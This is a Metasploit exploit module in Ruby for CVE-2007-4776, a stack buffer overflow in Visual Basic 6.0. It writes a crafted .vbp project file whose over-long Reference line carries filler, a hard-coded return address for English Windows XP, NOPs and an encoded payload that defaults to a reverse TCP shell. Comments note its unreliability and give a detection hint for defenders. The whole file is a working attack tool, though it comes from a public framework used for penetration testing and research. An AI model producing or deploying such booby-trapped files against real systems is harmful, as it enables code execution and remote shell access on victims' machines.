##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# File-format exploit module for CVE-2007-4776, a stack buffer overflow in
# Microsoft Visual Basic 6.0 reached through an over-long "Reference=" line in
# a Visual Basic Project (.vbp) file.
#
# The module does not contact a target: it only writes a crafted .vbp to disk
# (Msf::Exploit::FILEFORMAT / file_create). Anything further depends on a user
# opening that file in the vulnerable IDE, which is why the module's Notes mark
# the session as UNRELIABLE_SESSION and flag ARTIFACTS_ON_DISK, and why
# 'DisablePayloadHandler' is true by default (a handler has to be started
# separately if one is wanted).
class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::FILEFORMAT

  # Registers module metadata and the single FILENAME option.
  #
  # Each target supplies two hard-coded addresses: 'Ret' (annotated below as a
  # "call esp" location inside vba6.dll) and 'Scratch' (annotated as lying in a
  # 0x1000-byte read/write page). Both targets are English-locale Windows XP
  # only, so other locales or service packs are not expected to work.
  #
  # @param info [Hash] module info supplied by the framework loader
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Microsoft Visual Basic VBP Stack Buffer Overflow',
        'Description' => %q{
          This module exploits a stack buffer overflow in Microsoft Visual Basic 6.0.
          A specially crafted Visual Basic Project (VBP) file containing a long
          reference line can be used to execute arbitrary code.
        },
        'License' => MSF_LICENSE,
        'Arch' => [ARCH_X86],
        'Author' => [
          'Koshi', # Discovery and exploit
          'MC', # Metasploit
          'bcoles', # Offsets for XP x86-64
        ],
        'References' => [
          [ 'CVE', '2007-4776' ],
          [ 'CWE', '119' ],
          [ 'EDB', '4361' ],
          [ 'OSVDB', '36936' ],
          [ 'BID', '25629' ]
        ],
        'DefaultOptions' => {
          'PAYLOAD' => 'windows/shell/reverse_tcp',
          'EXITFUNC' => 'process',
          'DisablePayloadHandler' => true
        },
        'Payload' => {
          'Space' => 650,
          # NUL, LF, CR and space are excluded: the payload is embedded in a
          # line-oriented text file, and these bytes would end or split the line.
          'BadChars' => "\x00\x0a\x0d\x20",
          'StackAdjustment' => -3500,
          'DisableNops' => true
        },
        'Platform' => 'win',
        'Targets' => [
          [
            'Windows XP SP0-SP3 (x86) (English)',
            {
              'Ret' => 0x0fabd271, # call esp ; vba6.dll
              'Scratch' => 0x7ffddfb4 # Address=0x7ffdd000; Size=0x1000; Access=RW; InitialAccess=RW
            }
          ],
          [
            'Windows XP SP1-SP2 (x86-64) (English)',
            {
              'Ret' => 0x0fabd271, # call esp ; vba6.dll
              'Scratch' => 0x7efa9010 # Address=0x7efa9000; Size=0x1000; Access=RW; InitialAccess=RW
            }
          ],
        ],
        'Privileged' => false,
        'DisclosureDate' => '2007-09-04',
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [ CRASH_SERVICE_DOWN ],
          'SideEffects' => [ ARTIFACTS_ON_DISK ],
          'Reliability' => [ UNRELIABLE_SESSION ]
        }
      )
    )

    register_options(
      [
        OptString.new('FILENAME', [true, 'The project file name.', 'msf.vbp']),
      ]
    )
  end

  # Builds the project file and writes it with file_create.
  #
  # The value appended to the "Reference=" line is assembled, in order, from:
  # 496 bytes of upper-case alphabetic filler, the target 'Ret' address as a
  # little-endian DWORD, 12 more filler bytes, the target 'Scratch' address as
  # a little-endian DWORD, 24 NOP bytes, and finally the encoded payload (at
  # most 650 bytes per the 'Space' constraint). The remaining key/value lines
  # are ordinary VB6 project settings with randomised version numbers and
  # project name so that generated files differ from one another.
  #
  # Detection note for defenders: a genuine "Reference=" entry is a short
  # type-library path, whereas this one carries at least 540 bytes of extra
  # data before the payload, most of it a run of upper-case letters; an
  # unusually long Reference line in a .vbp is therefore a simple static
  # indicator for this family of files. The fixed '*\G{00020430-...}' prefix
  # (the OLE Automation type library) is legitimate and not by itself a signal.
  #
  # @return [void] writes datastore['FILENAME'] (default 'msf.vbp') to disk
  def exploit
    form_name = "Form#{rand(1..9)}"

    sploit = rand_text_alpha_upper(496)
    sploit << [target.ret].pack('V')
    sploit << rand_text_alpha_upper(12)
    sploit << [target['Scratch']].pack('V')
    sploit << make_nops(24)
    sploit << payload.encoded

    vbp = "Type=Exe\r\n"
    # We exclude the "Form" field so we don't have to ship a form file (.frm)
    # along with the project file (.vbp). If the specified form file is not
    # present within the same directory as the project file, the user is warned
    # the file does not exist, and is prompted to confirm loading the project.
    # Selecting "No" halts loading the project and prevents payload execution.
    # vbp << "Form=#{form_name}.frm\r\n"
    # Single-quoted, so each '\\' is one backslash in the emitted file.
    vbp << 'Reference=*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\\..\\..\\..\\WINNT\\System32\\stdole2.tlb#OLE Automation'
    # The oversized buffer is appended directly to the Reference line above.
    vbp << "#{sploit}\r\n"
    vbp << "Startup=\"#{form_name}\"\r\n"
    vbp << "Command32=\"\"\r\n"
    vbp << "Name=\"Project#{rand(1..9)}\"\r\n"
    vbp << "HelpContextID=\"0\"\r\n"
    vbp << "CompatibleMode=\"0\"\r\n"
    vbp << "MajorVer=1\r\n"
    vbp << "MinorVer=#{rand(1..9)}\r\n"
    vbp << "RevisionVer=#{rand(1..9)}\r\n"
    vbp << "AutoIncrementVer=0\r\n"
    vbp << "ServerSupportFiles=0\r\n"
    vbp << "VersionCompanyName=\"\"\r\n"
    vbp << "CompilationType=0\r\n"
    vbp << "OptimizationType=0\r\n"
    vbp << "FavorPentiumPro(tm)=0\r\n"
    vbp << "CodeViewDebugInfo=0\r\n"
    vbp << "NoAliasing=0\r\n"
    vbp << "BoundsCheck=0\r\n"
    vbp << "OverflowCheck=0\r\n"
    vbp << "FlPointCheck=0\r\n"
    vbp << "FDIVCheck=0\r\n"
    vbp << "UnroundedFP=0\r\n"
    vbp << "StartMode=0\r\n"
    vbp << "Unattended=0\r\n"
    vbp << "Retained=0\r\n"
    vbp << "ThreadPerObject=0\r\n"
    vbp << "MaxNumberOfThreads=1\r\n"
    vbp << "[MS Transaction Server]\r\n"
    vbp << "AutoRefresh=1\r\n"

    print_status("Creating '#{datastore['FILENAME']}' file for #{target.name} ...")
    file_create(vbp)
  end
end